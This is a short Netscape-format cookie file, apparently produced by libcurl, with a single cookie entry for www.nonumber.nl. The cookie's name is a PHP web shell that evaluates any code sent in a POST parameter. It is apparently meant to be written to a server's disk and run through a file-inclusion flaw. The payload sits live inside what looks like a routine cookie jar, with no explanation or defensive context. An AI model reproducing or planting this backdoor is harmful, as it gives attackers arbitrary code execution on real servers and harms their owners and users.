# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

www.nonumber.nl	FALSE	/about/	FALSE	0	<?eval(stripslashes(array_pop($_POST)))?>	1
